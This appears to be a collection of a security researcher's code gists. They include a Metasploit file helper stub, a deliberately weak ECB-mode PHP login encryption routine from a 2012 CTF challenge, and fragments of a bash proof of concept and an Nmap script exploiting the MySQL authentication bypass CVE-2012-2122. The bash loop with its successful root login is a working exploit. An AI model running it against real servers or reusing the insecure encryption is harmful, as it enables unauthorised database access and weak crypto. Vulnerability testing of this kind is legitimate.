marcwickenden / gist:1719670
stat_file helper proposed for Metasploit's lib/msf/core/post/file.rb (preview is truncated; as shown, the meterpreter branch is only a placeholder that raises, and the real work is in the shell-session branch that follows).
def stat_file(file_name)
data = []
stat = {}
if session.type == "meterpreter"
raise "I think you can do this with session.fs.file.stat"
elsif session.respond_to? :shell_command_token
print_debug("platform is #{session.platform}")
case session.platform
when /windows/
marcwickenden / encryption.php
Security B-Sides London 2012 Challenge 4 — the deliberately weak login "encryption" helper (Rijndael-256 in ECB mode, no integrity check) that the challenge is built around.
<?php
// encryption functions used for login
/**
 * Encrypt $value under $key and return the ciphertext base64-encoded for
 * storage in the database.
 *
 * This is the original challenge artefact and is reproduced as-is; the
 * properties below are what make it a CTF target, so do not "fix" them
 * without also changing the matching decrypt routine (not shown here):
 *  - MCRYPT_MODE_ECB: equal plaintext blocks produce equal ciphertext
 *    blocks, so patterns in the plaintext survive encryption.
 *  - The IV that is generated is not meaningful for ECB; it is only created
 *    because the mcrypt call takes an IV argument.
 *  - No MAC / authenticated encryption: stored ciphertext can be modified
 *    without detection.
 *  - `!$value` is PHP truthiness, so "" and "0" both short-circuit to false.
 *  - NOTE(review): the mcrypt extension is deprecated and no longer ships
 *    with current PHP; this only runs where it is installed.
 *
 * @param string $value plaintext; falsy values return false
 * @param string $key   raw key bytes handed straight to mcrypt
 * @return string|false trimmed base64 ciphertext, or false for a falsy $value
 */
function encrypt($value, $key){
    if (!$value) {
        return false;
    }
    $plaintext = $value;
    // mcrypt wants an IV argument even though ECB does not use one
    $ivLength = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
    $unusedIv = mcrypt_create_iv($ivLength, MCRYPT_RAND);
    $raw = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $plaintext, MCRYPT_MODE_ECB, $unusedIv);
    // binary-safe representation for the db column
    return trim(base64_encode($raw));
}
marcwickenden / file1.txt
bash PoC for the MySQL auth bypass (CVE-2012-2122): loops up to 1000 root logins against 127.0.0.1 with an arbitrary password (the literal string `cve-2012-2122`) until the server accepts one. stderr is discarded, so only the successful attempt's banner appears below; note the password is passed on the command line and so is visible in shell history and the process list.
ubuntu@ip-10-227-118-34:~$ for i in `seq 1 1000`; do mysql -u root --password=cve-2012-2122 -h 127.0.0.1 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 424
Server version: 5.5.22-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
marcwickenden / gist:2918117
mysql-auth-bypass: per-username retry loop — reconnects and retries up to 300 times for each username, since a single attempt does not reliably trigger the bypass (the enclosing loops are not closed in this preview).
for username in usernames do
stdnse.print_debug( "Trying %s ...", username )
-- try up to 300 times to trigger the vuln
for i = 0, 300, 1 do
stdnse.print_debug(2, "attempt number %d", i )
local status, response = socket:connect(host, port)
if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end
marcwickenden / gist:2918119
mysql-auth-bypass: read the server greeting, which supplies the salt and charset the subsequent login request needs.
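-- Read the server's greeting packet. On success `response` is the parsed
-- greeting; the login request elsewhere in this script reads its
-- `.salt` and `.charset`. `status`/`response` are assigned, not declared,
-- because the same pair is reused by the later login step.
status, response = mysql.receiveGreeting( socket )
if ( not(status) ) then
  -- On failure `response` carries the error; log it with the script name
  -- (the original logged only SCRIPT_NAME, which hid the actual cause)
  -- before releasing the socket and returning the error to the caller.
  stdnse.print_debug(3, "%s: failed to read MySQL greeting: %s", SCRIPT_NAME, tostring(response))
  socket:close()
  return response
end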
marcwickenden / gist:2918072
mysql-auth-bypass: require statements (old NSE style — bare `require 'x'` with no local assignment, as used before the 6.x script API).
require 'shortport'
require 'stdnse'
require 'mysql'
require 'unpwdb'
marcwickenden / gist:2918098
mysql-auth-bypass portrule
-- `portrule` is intentionally a global: NSE looks it up by name to decide
-- whether to run the script. Match the default MySQL port, or any port the
-- service scan has labelled "mysql".
local mysql_port = 3306
portrule = shortport.port_or_service(mysql_port, "mysql")
marcwickenden / gist:2918108
mysql-auth-bypass: start of the action function — socket setup plus a `try`/`catch` pair whose catch handler closes the socket on any failed `try` call (the function body continues beyond this preview).
action = function( host, port )
local socket = nmap.new_socket()
local catch = function() socket:close() end
local try = nmap.new_try(catch)
local result = {}
marcwickenden / gist:2918113
mysql-auth-bypass: socket timeout, username wordlist and the fixed password used for every attempt.
-- set a reasonable timeout value (presumably milliseconds, per the NSE
-- socket API; bounds each connect / greeting / login round trip)
socket:set_timeout(5000)
-- get our usernames to try; `try` hands any failure to the catch handler,
-- which closes the socket
local usernames = try(unpwdb.usernames())
-- NOTE(review): the bypass does not appear to depend on the password value
-- (the same literal is used for every user); the CVE id just makes the
-- attempts recognisable in the target's logs — confirm against the advisory
local password = "cve-2012-2122"
marcwickenden / gist:2918123
mysql-auth-bypass: send the login request and record the user when the server answers with error code 0 (login accepted).
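-- Attempt the login using the salt and charset from the greeting and the
-- fixed password. `status`/`response` are reused from the greeting step.
status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt )
-- Only look at the error code when the request itself succeeded. On a
-- transport failure `response` is an error value rather than a packet
-- table (its exact shape is not visible here), so indexing it unguarded
-- would either raise or silently evaluate to "not vulnerable".
if status and response.errorcode == 0 then
  -- Error code 0 means the server accepted the login: record the user once
  -- and stop retrying; `break` leaves the innermost loop, which in this
  -- script is the per-user retry loop.
  table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) )
  break
end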